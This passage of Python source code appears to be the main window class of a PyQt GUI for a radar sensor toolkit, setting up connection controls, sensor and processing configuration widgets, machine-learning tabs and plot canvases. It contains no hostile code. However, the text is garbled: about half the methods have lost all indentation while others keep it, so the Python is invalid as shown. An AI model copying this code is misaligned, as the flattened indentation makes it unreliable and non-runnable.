    # 15 ms plot refresh timer; parented to self so it stays alive.
    timer = QtCore.QTimer(self)
    timer.timeout.connect(self.plot_timer_fun)
    timer.start(15)
    self.plot_queue = []
def init_pyqtgraph(self):
pg.setConfigOption("background", "#f0f0f0")
pg.setConfigOption("foreground", "k")
pg.setConfigOption("leftButtonPan", False)
pg.setConfigOptions(antialias=True)
def init_labels(self):
# key: (text)
label_info = {
"sensor": ("Sensor",),
"sweep_buffer": ("Max buffered frames",),
"data_source": ("",),
"stored_frames": ("",),
"interface": ("Interface",),
"sweep_info": ("",),
"measured_update_rate": ("",),
"data_warnings": ("",),
"rssver": ("",),
"libver": ("",),
"unsupported_mode": ("Mode not supported by this module",),
}
self.labels = {}
for key, (text,) in label_info.items():
lbl = QLabel(self)
lbl.setText(text)
self.labels[key] = lbl
for k in ["data_warnings", "unsupported_mode"]:
lbl = self.labels[k]
lbl.setStyleSheet("color: #ff0000")
lbl.setVisible(False)
def init_textboxes(self):
# key: (text)
textbox_info = {
"host": ("192.168.1.100", True),
"sweep_buffer": ("1000", True),
"stored_frames": ("0", False),
"sweep_buffer_ml": ("unlimited", False),
}
self.textboxes = {}
for key, (text, enabled) in textbox_info.items():
self.textboxes[key] = QLineEdit(self)
self.textboxes[key].setText(text)
self.textboxes[key].setEnabled(enabled)
self.textboxes["sweep_buffer_ml"].setVisible(False)
def init_checkboxes(self):
# text, status, visible, enabled, function
checkbox_info = {
"verbose": ("Verbose logging", False, True, True, self.set_log_level),
}
self.checkboxes = {}
for key, (text, status, visible, enabled, fun) in checkbox_info.items():
cb = QCheckBox(text, self)
cb.setChecked(status)
cb.setVisible(visible)
cb.setEnabled(enabled)
if fun:
cb.stateChanged.connect(fun)
self.checkboxes[key] = cb
    def init_graphs(self, refresh=False):
        """Create and return the plot canvas for the currently selected module.

        Returns a pyqtgraph layout widget for regular services, or a plain
        image Label showing the logo when no module is selected. When
        ``refresh`` is False, the legacy (dict-based) processing parameters
        are also (re)installed via :meth:`add_params`.
        """
        processing_config = self.get_default_processing_config()
        # No service/detector selected: show the static logo instead of plots.
        if self.current_module_info.module is None:
            canvas = Label(self.ACC_IMG_FILENAME)
            self.refresh_pidgets()
            return canvas
        canvas = pg.GraphicsLayoutWidget()
        if not refresh:
            # Legacy services provide parameters as a plain dict; configbase
            # configs are handled through pidgets instead and reset both here.
            if not (processing_config and isinstance(processing_config, dict)):
                self.service_params = None
                self.service_defaults = None
            else:
                self.service_params = processing_config
                # Deep copy so editing live params never mutates the defaults.
                self.service_defaults = copy.deepcopy(self.service_params)
            self.add_params(self.service_params)
        self.reload_pg_updater(canvas=canvas)
        self.refresh_pidgets()
        return canvas
    def reload_pg_updater(self, canvas=None, session_info=None):
        """(Re)create the module's PGUpdater and set up its plots on *canvas*.

        If no canvas is given, a fresh one is created and swapped in. When no
        *session_info* is supplied, a mock client produces one so plots can
        be set up without a live sensor connection.
        """
        if canvas is None:
            canvas = pg.GraphicsLayoutWidget()
            self.swap_canvas(canvas)
        sensor_config = self.get_sensor_config()
        processing_config = self.update_service_params()
        if session_info is None:
            # check_config=False: the mock only needs to produce metadata.
            session_info = clients.MockClient().setup_session(sensor_config, check_config=False)
        self.service_widget = self.current_module_info.module.PGUpdater(
            sensor_config, processing_config, session_info
        )
        self.service_widget.setup(canvas)
    def init_pidgets(self):
        """Create all configbase pidgets and place them in their grid sections.

        Sensor-config pidgets go into the basic/advanced sensor sections;
        processing-config pidgets into the basic/advanced processing sections.
        Event handlers are registered so edits propagate back to the GUI.
        """
        self.last_sensor_config = None
        for sensor_config in self.module_label_to_sensor_config_map.values():
            sensor_config._event_handlers.add(self.pidget_sensor_config_event_handler)
            pidgets = sensor_config._create_pidgets()
            for pidget in pidgets:
                if pidget is None:
                    continue
                category = pidget.param.category
                if category == configbase.Category.ADVANCED:
                    grid = self.advanced_sensor_config_section.grid
                    count = self.advanced_sensor_param_count
                else:
                    grid = self.basic_sensor_config_section.grid
                    count = self.basic_sensor_param_count
                grid.addWidget(pidget, count.val, 0, 1, 2)
                count.post_incr()
        self.last_processing_config = None
        for processing_config in self.module_label_to_processing_config_map.values():
            # Legacy (non-configbase) processing configs have no pidgets.
            if not isinstance(processing_config, configbase.Config):
                continue
            processing_config._event_handlers.add(self.pidget_processing_config_event_handler)
            pidgets = processing_config._create_pidgets()
            for pidget in pidgets:
                if pidget is None:
                    continue
                # NOTE(review): unlike the sensor sections above, both the
                # advanced and basic processing branches share the single
                # param_grid_count counter — presumably intentional (row
                # numbers just end up sparse per grid); confirm.
                if pidget.param.category == configbase.Category.ADVANCED:
                    grid = self.advanced_processing_config_section.grid
                    count = self.param_grid_count
                else:
                    grid = self.basic_processing_config_section.grid
                    count = self.param_grid_count
                grid.addWidget(pidget, count.val, 0, 1, 2)
                count.post_incr()
        self.refresh_pidgets()
        self.set_gui_state(None, None)
    def refresh_pidgets(self):
        """Sync sensor and processing pidgets with the active module, then
        re-run the cross-config checks (order matters: checks need both)."""
        self.refresh_sensor_pidgets()
        self.refresh_processing_pidgets()
        self.update_pidgets_on_event()
def refresh_sensor_pidgets(self):
sensor_config = self.get_sensor_config()
if self.last_sensor_config != sensor_config:
if self.last_sensor_config is not None:
self.last_sensor_config._state = configbase.Config.State.UNLOADED
self.last_sensor_config = sensor_config
if sensor_config is None:
self.basic_sensor_config_section.setVisible(False)
self.advanced_sensor_config_section.setVisible(False)
return
sensor_config._state = configbase.Config.State.LOADED
has_basic_params = has_advanced_params = False
for param in sensor_config._get_params():
if param.visible:
if param.category == configbase.Category.ADVANCED:
has_advanced_params = True
else:
has_basic_params = True
if self.get_gui_state("ml_tab") in ["main", "feature_select", "eval"]:
self.basic_sensor_config_section.setVisible(has_basic_params)
self.advanced_sensor_config_section.setVisible(has_advanced_params)
def refresh_processing_pidgets(self):
processing_config = self.get_processing_config()
if self.last_processing_config != processing_config:
if isinstance(self.last_processing_config, configbase.Config):
self.last_processing_config._state = configbase.Config.State.UNLOADED
self.last_processing_config = processing_config
if processing_config is None:
self.basic_processing_config_section.hide()
self.advanced_processing_config_section.hide()
return
# TODO: remove the follow check when migration to configbase is done
if not isinstance(processing_config, configbase.Config):
return
processing_config._state = configbase.Config.State.LOADED
has_basic_params = has_advanced_params = False
for param in processing_config._get_params():
if param.visible:
if param.category == configbase.Category.ADVANCED:
has_advanced_params = True
else:
has_basic_params = True
if self.get_gui_state("ml_tab") == "main":
self.basic_processing_config_section.setVisible(has_basic_params)
self.advanced_processing_config_section.setVisible(has_advanced_params)
def pidget_sensor_config_event_handler(self, sensor_config):
if threading.current_thread().name != "MainThread":
self.sig_sensor_config_pidget_event.emit(sensor_config)
return
self.update_pidgets_on_event(sensor_config=sensor_config)
if self.get_gui_state("ml_mode"):
self.feature_sidepanel.textboxes["update_rate"].setText(str(sensor_config.update_rate))
self.feature_select.check_limits()
    def pidget_processing_config_event_handler(self, processing_config):
        """Push a changed processing config to the live processor and plots.

        Calls from worker threads are re-dispatched through the signal since
        Qt widgets must only be touched from the main thread.
        """
        if threading.current_thread().name != "MainThread":
            self.sig_processing_config_pidget_event.emit(processing_config)
            return
        # Processor
        try:
            if isinstance(self.radar.external, self.current_module_info.processor):
                self.radar.external.update_processing_config(processing_config)
        except AttributeError:
            # Best effort: no processor running, or module lacks one.
            pass
        # Plot updater
        try:
            self.service_widget.update_processing_config(processing_config)
        except AttributeError:
            # Best effort: plot updater absent or without live-update support.
            pass
        self.update_pidgets_on_event(processing_config=processing_config)
def update_pidgets_on_event(self, sensor_config=None, processing_config=None):
if sensor_config is None:
sensor_config = self.get_sensor_config()
if sensor_config is None:
return
if processing_config is None:
processing_config = self.get_processing_config()
if hasattr(processing_config, "check_sensor_config"):
pass_on_alerts = processing_config.check_sensor_config(sensor_config)
else:
pass_on_alerts = {
"processing": [],
"sensor": [],
}
all_alerts = []
alerts = sensor_config._update_pidgets(additional_alerts=pass_on_alerts["sensor"])
all_alerts.extend(alerts)
if isinstance(processing_config, configbase.Config):
alerts = processing_config._update_pidgets(
additional_alerts=pass_on_alerts["processing"]
)
all_alerts.extend(alerts)
has_error = any([a.severity == configbase.Severity.ERROR for a in all_alerts])
self.set_gui_state("has_config_error", has_error)
def init_dropdowns(self):
self.module_dd = QComboBox(self)
for module_info in MODULE_INFOS:
if self.get_gui_state("ml_mode"):
if module_info.allow_ml:
self.module_dd.addItem(module_info.label)
else:
self.module_dd.addItem(module_info.label)
self.module_dd.currentIndexChanged.connect(self.update_canvas)
self.interface_dd = QComboBox(self)
self.interface_dd.addItem("Socket")
self.interface_dd.addItem("Serial")
self.interface_dd.addItem("SPI")
self.interface_dd.addItem("Simulated")
self.interface_dd.currentIndexChanged.connect(self.update_interface)
self.ports_dd = QComboBox(self)
self.ports_dd.hide()
self.update_ports()
def set_multi_sensors(self):
module_multi_sensor_support = self.current_module_info.multi_sensor
if self.get_gui_state("load_state") == LoadState.LOADED:
source_sensors = json.loads(self.data.sensor_config_dump)["sensor"]
else:
source_sensors = self.sensors_available
for name in self.sensor_widgets:
self.sensor_widgets[name].set_multi_sensor_support(
source_sensors, module_multi_sensor_support
)
def set_sensors(self, sensors):
for name in self.sensor_widgets:
self.sensor_widgets[name].set_sensors(sensors)
def get_sensors(self, widget_name=None):
if widget_name is None:
widget_name = "main"
sensors = self.sensor_widgets[widget_name].get_sensors()
return sensors
    def update_ports(self):
        """Rescan serial ports and repopulate the ports dropdown.

        On native posix systems, tagged (recognized) ports get a label suffix
        and the last tagged port is pre-selected. Under WSL, only ports whose
        first embedded number is below 20 are listed.
        """
        try:
            opsys = os.uname()
            in_wsl = "microsoft" in opsys.release.lower() and "linux" in opsys.sysname.lower()
        except Exception:
            # os.uname is unavailable on some platforms (e.g. Windows).
            in_wsl = False
        select = -1
        port_tag_tuples = utils.get_tagged_serial_ports()
        if not in_wsl and os.name == "posix":
            ports = []
            for i, (port, tag) in enumerate(port_tag_tuples):
                tag_string = ""
                if tag:
                    # Remember the tagged port index so it can be pre-selected.
                    select = i
                    tag_string = " ({})".format(tag)
                ports.append(port + tag_string)
        else:
            ports = [port for port, *_ in port_tag_tuples]
        try:
            if in_wsl:
                print("WSL detected. Limiting serial ports")
                ports_reduced = []
                for p in ports:
                    if int(re.findall(r"\d+", p)[0]) < 20:
                        ports_reduced.append(p)
                ports = ports_reduced
        except Exception:
            # A port name without digits etc.: keep the unfiltered list.
            pass
        self.ports_dd.clear()
        self.ports_dd.addItems(ports)
        if select >= 0:
            self.ports_dd.setCurrentIndex(select)
def advanced_port(self):
dialog = AdvancedSerialDialog(self.override_baudrate, self)
ret = dialog.exec_()
if ret == QtWidgets.QDialog.Accepted:
self.override_baudrate = dialog.get_state()
dialog.deleteLater()
def start_btn_clicked(self):
if self.get_gui_state("load_state") == LoadState.LOADED:
self.data = None
self.session_info_view.update(None)
self.set_gui_state("load_state", LoadState.UNLOADED)
else:
self.start_scan()
def save_file_btn_clicked(self):
self.save_scan(self.data)
def replay_btn_clicked(self):
self.load_scan(restart=True)
    def init_buttons(self):
        """Create all push buttons from a declarative table.

        The group field (last tuple element) is informational here; buttons
        are placed into their sections by :meth:`init_sublayouts`.
        """
        # key: text, function, enabled, hidden, group
        button_info = {
            "start": ("Start", self.start_btn_clicked, False, False, "scan"),
            "connect": ("Connect", self.connect_to_server, True, False, "connection"),
            "stop": ("Stop", self.stop_scan, False, False, "scan"),
            "load_scan": ("Load from file", self.load_scan, True, False, "scan"),
            "save_scan": ("Save to file", self.save_file_btn_clicked, False, False, "scan"),
            "replay_buffered": (
                "Replay",
                self.replay_btn_clicked,
                False,
                False,
                "scan",
            ),
            "scan_ports": ("Scan ports", self.update_ports, True, True, "connection"),
            "sensor_defaults": (
                "Defaults",
                self.sensor_defaults_handler,
                False,
                False,
                "sensor",
            ),
            "service_defaults": (
                "Defaults",
                self.service_defaults_handler,
                True,
                False,
                "service",
            ),
            "service_help": (
                "?",
                self.service_help_button_handler,
                True,
                False,
                "service",
            ),
            "advanced_defaults": (
                "Defaults",
                self.service_defaults_handler,
                True,
                False,
                "advanced",
            ),
            "save_process_data": (
                "Save process data",
                lambda: self.handle_advanced_process_data("save"),
                True,
                True,
                "advanced",
            ),
            "load_process_data": (
                "Load process data",
                lambda: self.handle_advanced_process_data("load"),
                True,
                True,
                "advanced",
            ),
            "advanced_port": (
                "Advanced port settings",
                self.advanced_port,
                True,
                True,
                "connection",
            ),
        }
        self.buttons = {}
        for key, (text, fun, enabled, hidden, _) in button_info.items():
            btn = QPushButton(text, self)
            btn.clicked.connect(fun)
            btn.setEnabled(enabled)
            btn.setHidden(hidden)
            btn.setMinimumWidth(150)
            self.buttons[key] = btn
    def init_sublayouts(self):
        """Assemble the left control panel: connection, scan controls, sensor,
        session info, and processing sections stacked in a grid layout."""
        self.main_sublayout = QtWidgets.QGridLayout()
        self.main_sublayout.setContentsMargins(0, 3, 0, 3)
        self.main_sublayout.setSpacing(0)
        # --- Connection section -------------------------------------------
        self.server_section = CollapsibleSection("Connection", is_top=True)
        self.main_sublayout.addWidget(self.server_section, 0, 0)
        self.server_section.grid.addWidget(self.labels["interface"], 0, 0)
        self.server_section.grid.addWidget(self.interface_dd, 0, 1)
        # ports_dd and the host textbox share row 1; update_interface shows
        # only the one matching the selected interface.
        self.server_section.grid.addWidget(self.ports_dd, 1, 0)
        self.server_section.grid.addWidget(self.textboxes["host"], 1, 0, 1, 2)
        self.server_section.grid.addWidget(self.buttons["scan_ports"], 1, 1)
        self.server_section.grid.addWidget(self.buttons["advanced_port"], 2, 0, 1, 2)
        self.server_section.grid.addWidget(self.buttons["connect"], 3, 0, 1, 2)
        self.server_section.grid.addWidget(self.labels["rssver"], 4, 0, 1, 2)
        # --- Scan controls section ----------------------------------------
        self.control_section = CollapsibleSection("Scan controls")
        self.main_sublayout.addWidget(self.control_section, 1, 0)
        c = self.control_grid_count
        # Sublayout for service dropdown and a small help button.
        service_and_help_layout = QtWidgets.QHBoxLayout()
        service_and_help_layout.addWidget(self.module_dd)
        service_and_help_layout.addWidget(self.buttons["service_help"])
        self.buttons["service_help"].setFixedWidth(30)
        self.control_section.grid.addLayout(service_and_help_layout, c.pre_incr(), 0, 1, 2)
        self.control_section.grid.addWidget(self.labels["unsupported_mode"], c.pre_incr(), 0, 1, 2)
        self.control_section.grid.addWidget(self.buttons["start"], c.pre_incr(), 0)
        self.control_section.grid.addWidget(self.buttons["stop"], c.val, 1)
        self.control_section.grid.addWidget(self.buttons["save_scan"], c.pre_incr(), 0)
        self.control_section.grid.addWidget(self.buttons["load_scan"], c.val, 1)
        self.control_section.grid.addWidget(self.buttons["replay_buffered"], c.pre_incr(), 0, 1, 2)
        self.control_section.grid.addWidget(self.labels["data_source"], c.pre_incr(), 0, 1, 2)
        self.control_section.grid.addWidget(self.labels["sweep_buffer"], c.pre_incr(), 0)
        # Regular and ML sweep-buffer boxes share a cell; one is shown at a time.
        self.control_section.grid.addWidget(self.textboxes["sweep_buffer"], c.val, 1)
        self.control_section.grid.addWidget(self.textboxes["sweep_buffer_ml"], c.val, 1)
        self.control_section.grid.addWidget(self.labels["stored_frames"], c.pre_incr(), 0)
        self.control_section.grid.addWidget(self.textboxes["stored_frames"], c.val, 1)
        # --- Sensor settings sections -------------------------------------
        self.basic_sensor_config_section = CollapsibleSection("Sensor settings")
        self.main_sublayout.addWidget(self.basic_sensor_config_section, 4, 0)
        c = self.basic_sensor_param_count
        self.basic_sensor_config_section.grid.addWidget(
            self.buttons["sensor_defaults"], c.post_incr(), 0, 1, 2
        )
        self.basic_sensor_config_section.grid.addWidget(self.labels["sensor"], c.val, 0)
        sensor_selection = SensorSelection(error_handler=self.error_message)
        self.basic_sensor_config_section.grid.addWidget(sensor_selection, c.post_incr(), 1)
        self.sensor_widgets["main"] = sensor_selection
        self.advanced_sensor_config_section = CollapsibleSection(
            "Advanced sensor settings", init_collapsed=True
        )
        self.main_sublayout.addWidget(self.advanced_sensor_config_section, 5, 0)
        # --- Session info section -----------------------------------------
        self.session_info_section = CollapsibleSection(
            "Session information (sensor metadata)", init_collapsed=True
        )
        self.main_sublayout.addWidget(self.session_info_section, 6, 0)
        self.session_info_view = SessionInfoView(self.session_info_section)
        self.session_info_section.grid.addWidget(self.session_info_view, 0, 0, 1, 2)
        # --- Processing settings sections ---------------------------------
        self.basic_processing_config_section = CollapsibleSection("Processing settings")
        self.main_sublayout.addWidget(self.basic_processing_config_section, 7, 0)
        self.basic_processing_config_section.grid.addWidget(
            self.buttons["service_defaults"], 0, 0, 1, 2
        )
        self.advanced_processing_config_section = CollapsibleSection(
            "Advanced processing settings", init_collapsed=True
        )
        self.main_sublayout.addWidget(self.advanced_processing_config_section, 8, 0)
        self.advanced_processing_config_section.grid.addWidget(
            self.buttons["advanced_defaults"], 0, 0, 1, 2
        )
        self.advanced_processing_config_section.grid.addWidget(
            self.buttons["load_process_data"], 1, 0
        )
        self.advanced_processing_config_section.grid.addWidget(
            self.buttons["save_process_data"], 1, 1
        )
        # Row 9 stretches so the sections stay packed at the top.
        self.main_sublayout.setRowStretch(9, 1)
    def init_panel_scroll_area(self):
        """Wrap the left control panel in a fixed-width, vertical-only scroll area.

        A QStackedWidget holds the main control panel so alternative panels
        (e.g. the ML training side panel) can be swapped in per tab.
        """
        self.panel_scroll_area = QtWidgets.QScrollArea()
        self.panel_scroll_area.setFrameShape(QFrame.NoFrame)
        self.panel_scroll_area.setMinimumWidth(350)
        self.panel_scroll_area.setMaximumWidth(600)
        self.panel_scroll_area.setWidgetResizable(True)
        self.panel_scroll_area.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
        self.panel_scroll_area.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
        # Disable horizontal scrolling entirely (policy alone still allows wheel).
        self.panel_scroll_area.horizontalScrollBar().setEnabled(False)
        self.panel_scroll_area_widget = QStackedWidget(self.panel_scroll_area)
        self.panel_scroll_area.setWidget(self.panel_scroll_area_widget)
        self.main_sublayout_widget = QWidget(self.panel_scroll_area_widget)
        self.main_sublayout_widget.setLayout(self.main_sublayout)
        self.panel_scroll_area_widget.addWidget(self.main_sublayout_widget)
        self.panel_scroll_area_widget.setCurrentWidget(self.main_sublayout_widget)
def init_statusbar(self):
self.statusBar().showMessage("Not connected")
self.labels["sweep_info"].setFixedWidth(220)
self.labels["sweep_info"].setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignRight)
self.labels["measured_update_rate"].setToolTip("Measured update rate")
self.labels["measured_update_rate"].setFixedWidth(120)
self.statusBar().addPermanentWidget(self.labels["data_warnings"])
self.statusBar().addPermanentWidget(self.labels["sweep_info"])
self.statusBar().addPermanentWidget(self.labels["measured_update_rate"])
self.statusBar().addPermanentWidget(self.labels["libver"])
self.statusBar().addPermanentWidget(self.checkboxes["verbose"])
self.statusBar().setStyleSheet("QStatusBar{border-top: 1px solid lightgrey;}")
self.statusBar().show()
    def init_machine_learning(self):
        """Set up ML state, GUI elements, tabs, and panels (ML mode only).

        The ML modules are imported here rather than at the top of the file —
        presumably so the regular GUI works without them; confirm.
        """
        if self.get_gui_state("ml_mode"):
            import feature_processing
            import ml_gui_elements as ml_gui
            import ml_state
            self.ml_elements = ml_gui
            self.ml_external = feature_processing.DataProcessor
            self.ml_module = feature_processing
            self.ml_state = ml_state.MLState(self)
            self.ml_info_widget = ml_state.MLStateWidget(self)
            self.ml_state.add_status_widget(self.ml_info_widget)
            self.ml_model_ops = ml_gui.ModelOperations(self)
            self.init_tabs()
            self.init_ml_panels()
    def init_tabs(self):
        """Create the ML tab widget and instantiate each tab's content frame."""
        self.ml_parent_widget = QtWidgets.QSplitter(self.main_widget)
        self.ml_parent_widget.resize(300, 200)
        self.ml_parent_widget.setOrientation(QtCore.Qt.Vertical)
        self.ml_parent_widget.setStyleSheet("QSplitter::handle{background: lightgrey}")
        self.ml_parent_widget.setFrameStyle(QFrame.Panel | QFrame.Sunken)
        self.tab_parent = QTabWidget(self.ml_parent_widget)
        self.tab_parent.setTabPosition(QTabWidget.South)
        self.ml_parent_widget.addWidget(self.tab_parent)
        self.ml_parent_widget.addWidget(self.ml_info_widget)
        # key: (tab widget, visible tab label)
        self.tabs = {
            "collect": (QWidget(self.tab_parent), "Select service"),
            "feature_select": (QWidget(self.tab_parent), "Feature configuration"),
            "feature_extract": (QWidget(self.tab_parent), "Feature extraction"),
            "feature_inspect": (QWidget(self.tab_parent), "Feature inspection"),
            "model_select": (QWidget(self.tab_parent), "Model parameters"),
            "train": (QWidget(self.tab_parent), "Train Model"),
            "eval": (QWidget(self.tab_parent), "Use Model"),
        }
        # Maps a visible tab label to the gui_state "ml_tab" value.
        # NOTE(review): "Select service" maps to "main" although its key in
        # self.tabs is "collect" — looks intentional (set_gui_state and the
        # refresh_*_pidgets checks use "main"); confirm.
        self.tabs_text_to_key = {
            "Select service": "main",
            "Feature configuration": "feature_select",
            "Feature extraction": "feature_extract",
            "Feature inspection": "feature_inspect",
            "Model parameters": "model_select",
            "Train Model": "train",
            "Use Model": "eval",
        }
        for key, (tab, label) in self.tabs.items():
            self.tab_parent.addTab(tab, label)
            tab.layout = QtWidgets.QVBoxLayout()
            tab.setLayout(tab.layout)
            tab.setObjectName("child")
            tab.setStyleSheet("QWidget#child{background: #f0f0f0}")
            # Collapse the (widget, label) tuple down to just the widget.
            self.tabs[key] = tab
        self.tab_parent.currentChanged.connect(self.tab_changed)
        # Instantiate the content frame for each tab.
        self.feature_select = self.ml_elements.FeatureSelectFrame(
            self.main_widget,
            gui_handle=self,
        )
        self.tabs["feature_select"].layout.addWidget(self.feature_select)
        self.feature_extract = self.ml_elements.FeatureExtractFrame(
            self.main_widget,
            gui_handle=self,
        )
        self.tabs["feature_extract"].layout.addWidget(self.feature_extract)
        self.feature_inspect = self.ml_elements.FeatureInspectFrame(
            self.main_widget,
            gui_handle=self,
        )
        self.tabs["feature_inspect"].layout.addWidget(self.feature_inspect)
        self.model_select = self.ml_elements.ModelSelectFrame(
            self.main_widget,
            gui_handle=self,
        )
        self.tabs["model_select"].layout.addWidget(self.model_select)
        self.training = self.ml_elements.TrainingFrame(self.main_widget, gui_handle=self)
        self.tabs["train"].layout.addWidget(self.training)
        self.eval_model = self.ml_elements.EvalFrame(self.main_widget, gui_handle=self)
        self.tabs["eval"].layout.addWidget(self.eval_model)
    def init_ml_panels(self):
        """Create the ML side panels: feature settings and training."""
        # feature select/extract/inspect side panel
        self.feature_section = CollapsibleSection("Feature settings", init_collapsed=False)
        self.main_sublayout.addWidget(self.feature_section, 3, 0)
        self.feature_sidepanel = self.ml_elements.FeatureSidePanel(
            self.panel_scroll_area_widget, self
        )
        self.feature_section.grid.addWidget(self.feature_sidepanel, 0, 0, 1, 2)
        # Hidden by default; shown when an ML feature tab is active.
        self.feature_section.hide()
        self.feature_section.button_event(override=False)
        # training panel
        self.training_sidepanel = self.ml_elements.TrainingSidePanel(
            self.panel_scroll_area_widget, self
        )
        self.panel_scroll_area_widget.addWidget(self.training_sidepanel)
def tab_changed(self, index):
tab = self.tab_parent.tabText(index)
self.set_gui_state("ml_tab", self.tabs_text_to_key[tab])
def enable_tabs(self, enable):
if not self.get_gui_state("ml_mode"):
return
current_tab = self.tab_parent.currentIndex()
for i in range(len(self.tabs)):
if i != current_tab:
self.tab_parent.setTabEnabled(i, enable)
    def add_params(self, params, start_up_mode=None):
        """Install legacy dict-based processing parameter widgets.

        Hides all previously created parameter widgets, then (re)creates or
        re-shows the widgets for *params* of the current module. With
        *start_up_mode* set, widgets are created for that mode but kept
        hidden (used to pre-build widgets at start-up).
        """
        if params is None:
            params = {}
        self.buttons["load_process_data"].hide()
        self.buttons["save_process_data"].hide()
        # Hide every existing parameter widget for every known mode.
        for mode in self.service_labels:
            for param_key in self.service_labels[mode]:
                for element in self.service_labels[mode][param_key]:
                    if element in ["label", "box", "checkbox", "button"]:
                        self.service_labels[mode][param_key][element].setVisible(False)
        if start_up_mode is None:
            mode = self.current_module_label
            set_visible = True
        else:
            mode = start_up_mode
            set_visible = False
        if mode not in self.service_labels:
            self.service_labels[mode] = {}
        advanced_available = False
        for param_key, param_dict in params.items():
            if param_key not in self.service_labels[mode]:
                # First time this parameter is seen: create its widgets.
                param_gui_dict = {}
                self.service_labels[mode][param_key] = param_gui_dict
                advanced_available = bool(param_dict.get("advanced"))
                if advanced_available:
                    grid = self.advanced_processing_config_section.grid
                else:
                    grid = self.basic_processing_config_section.grid
                param_gui_dict["advanced"] = advanced_available
                if "send_process_data" == param_key:
                    # Special parameter backed by the shared load/save buttons.
                    data_buttons = param_gui_dict
                    data_buttons["load_button"] = self.buttons["load_process_data"]
                    data_buttons["save_button"] = self.buttons["save_process_data"]
                    data_buttons["load_text"] = "Load " + param_dict["text"]
                    data_buttons["save_text"] = "Save " + param_dict["text"]
                    data_buttons["load_button"].setText(data_buttons["load_text"])
                    data_buttons["save_button"].setText(data_buttons["save_text"])
                    data_buttons["load_button"].setVisible(set_visible)
                    data_buttons["save_button"].setVisible(set_visible)
                elif isinstance(param_dict["value"], bool):
                    # Boolean parameter: a single checkbox spanning both columns.
                    param_gui_dict["checkbox"] = QCheckBox(param_dict["name"], self)
                    param_gui_dict["checkbox"].setChecked(param_dict["value"])
                    grid.addWidget(param_gui_dict["checkbox"], self.param_grid_count.val, 0, 1, 2)
                elif param_dict["value"] is not None:
                    # Value parameter: label + line edit, with limits/default kept.
                    param_gui_dict["label"] = QLabel(self)
                    param_gui_dict["label"].setMinimumWidth(125)
                    param_gui_dict["label"].setText(param_dict["name"])
                    param_gui_dict["box"] = QLineEdit(self)
                    param_gui_dict["box"].setText(str(param_dict["value"]))
                    param_gui_dict["limits"] = param_dict["limits"]
                    param_gui_dict["default"] = param_dict["value"]
                    grid.addWidget(param_gui_dict["label"], self.param_grid_count.val, 0)
                    grid.addWidget(param_gui_dict["box"], self.param_grid_count.val, 1)
                    param_gui_dict["box"].setVisible(set_visible)
                else:  # param is only a label
                    param_gui_dict["label"] = QLabel(self)
                    param_gui_dict["label"].setText(str(param_dict["text"]))
                    grid.addWidget(param_gui_dict["label"], self.param_grid_count.val, 0, 1, 2)
                self.param_grid_count.post_incr()
            else:
                # Widgets already exist: just toggle their visibility.
                param_gui_dict = self.service_labels[mode][param_key]
                for element in param_gui_dict:
                    if element in ["label", "box", "checkbox"]:
                        param_gui_dict[element].setVisible(set_visible)
                    if "button" in element:
                        data_buttons = param_gui_dict
                        data_buttons["load_button"].setText(data_buttons["load_text"])
                        data_buttons["save_button"].setText(data_buttons["save_text"])
                        data_buttons["load_button"].setVisible(set_visible)
                        data_buttons["save_button"].setVisible(set_visible)
                if param_gui_dict["advanced"]:
                    advanced_available = True
        if start_up_mode is None:
            if self.get_gui_state("ml_tab") == "main":
                self.basic_processing_config_section.setVisible(bool(params))
            if advanced_available:
                self.advanced_processing_config_section.show()
                self.advanced_processing_config_section.button_event(override=True)
            else:
                self.advanced_processing_config_section.hide()
def sensor_defaults_handler(self):
config = self.get_sensor_config()
if config is None:
return
default_config = self.current_module_info.sensor_config_class()
config._loads(default_config._dumps())
def service_defaults_handler(self):
processing_config = self.get_processing_config()
if isinstance(processing_config, configbase.Config):
processing_config._reset()
return
mode = self.current_module_label
if self.service_defaults is None:
return
for key in self.service_defaults:
if key in self.service_labels[mode]:
if "box" in self.service_labels[mode][key]:
self.service_labels[mode][key]["box"].setText(
str(self.service_defaults[key]["value"])
)
if "checkbox" in self.service_labels[mode][key]:
self.service_labels[mode][key]["checkbox"].setChecked(
bool(self.service_defaults[key]["value"])
)
def service_help_button_handler(self):
url = self.current_module_info.docs_url
_ = webbrowser.open_new_tab(url)
    def update_canvas(self, force_update=False):
        """React to a module (service/detector) selection change.

        Rebuilds the plot canvas when the module changes (or when *force_update*
        is set), and discards loaded data when the underlying data type changes.
        """
        module_label = self.module_dd.currentText()
        switching_module = self.current_module_label != module_label
        self.current_module_label = module_label
        self.current_module_info = MODULE_LABEL_TO_MODULE_INFO_MAP[module_label]
        if self.current_module_info.module is None:
            data_type = None
            self.external = None
        else:
            data_type = self.current_module_info.sensor_config_class().mode
            self.external = self.current_module_info.processor
        switching_data_type = self.current_data_type != data_type
        self.current_data_type = data_type
        if switching_data_type:
            # Loaded data is incompatible with the new mode; discard it.
            self.data = None
            self.session_info_view.update(None)
            self.set_gui_state("load_state", LoadState.UNLOADED)
        if force_update or switching_module:
            if not switching_module:
                # Same module: keep its parameters, just refresh their values.
                self.update_service_params()
            new_canvas = self.init_graphs(refresh=(not switching_module))
            self.swap_canvas(new_canvas)
def swap_canvas(self, new_canvas):
if self.canvas is not None:
self.canvas_layout.removeWidget(self.canvas)
self.canvas.setParent(None)
self.canvas.deleteLater()
self.canvas_layout.addWidget(new_canvas)
self.canvas = new_canvas
def update_interface(self):
if self.gui_states["server_connected"]:
self.connect_to_server()
if "serial" in self.interface_dd.currentText().lower():
self.ports_dd.show()
self.textboxes["host"].hide()
self.buttons["advanced_port"].show()
self.buttons["scan_ports"].show()
self.update_ports()
elif "spi" in self.interface_dd.currentText().lower():
self.ports_dd.hide()
self.textboxes["host"].hide()
self.buttons["advanced_port"].hide()
self.buttons["scan_ports"].hide()
elif "socket" in self.interface_dd.currentText().lower():
self.ports_dd.hide()
self.textboxes["host"].show()
self.buttons["advanced_port"].hide()
self.buttons["scan_ports"].hide()
elif "simulated" in self.interface_dd.currentText().lower():
self.ports_dd.hide()
self.textboxes["host"].hide()
self.buttons["advanced_port"].hide()
self.buttons["scan_ports"].hide()
self.set_multi_sensors()
def error_message(self, text, info_text=None):
if self.under_test:
raise Exception
if not text:
return
message_box = BiggerMessageBox(self.main_widget)
message_box.setIcon(QtWidgets.QMessageBox.Warning)
